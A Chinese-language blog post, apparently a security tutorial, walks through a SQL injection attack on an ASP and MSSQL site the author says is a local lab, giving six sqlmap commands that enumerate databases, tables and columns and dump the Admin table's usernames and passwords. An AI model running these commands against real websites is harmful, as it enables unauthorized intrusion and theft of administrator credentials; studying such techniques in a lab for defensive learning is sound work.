欢迎来到【血梦博客】 今天是:2020年07月12日 星期日
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> 实战黑客sqlmap渗透攻击mssql数据库最新教程

实战黑客sqlmap渗透攻击mssql数据库最新教程

作者:血梦 日期:2020-03-20 浏览:104分类: 渗透测试 已提交百度收录

今天搭建了一个asp+mssql数据库的环境用于安全测试学习

1.判断注入点及获取网站信息:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2005

2.获取所有数据库:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs


网站用的数据库是这个sqlZR

3.获取网站当前使用的数据库:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db

4.获取数据库中的表名:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables

5.获取数据表中的字段名:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns

6.获取字段中的内容

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump

看到了吧,几条命名就把管理员的账号密码给跑出来了。

学习网络安全技术的话,可以关注我,每天都会有相应的教程发布的,

咱们共同学习,进步

关灯